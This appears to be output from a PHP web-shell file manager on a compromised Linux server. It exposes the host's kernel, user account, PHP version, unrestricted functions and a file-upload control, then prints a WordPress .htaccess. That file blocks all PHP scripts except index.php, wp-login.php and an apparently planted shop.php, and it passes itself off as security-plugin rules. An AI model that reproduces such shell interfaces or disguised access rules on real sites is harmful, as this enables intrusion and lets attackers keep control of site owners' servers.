HEX
Server: Apache/2.4.52 (Ubuntu)
System: Linux spn-python 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:42:41 UTC 2023 x86_64
User: arjun (1000)
PHP: 8.1.2-1ubuntu2.20
Disabled: NONE
Upload Files
File: /var/www/html/Siyum_old/.htaccess
# BEGIN All In One WP Security
#AIOWPS_CUSTOM_RULES_START
<Files *.php>
    Order Allow,Deny
    Deny from all
</Files>

<FilesMatch "(index|wp-login|shop)\.php$">
    Order Allow,Deny
    Allow from all
</FilesMatch>

<IfModule mod_rewrite.c>

RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

#AIOWPS_CUSTOM_RULES_END
# END All In One WP Security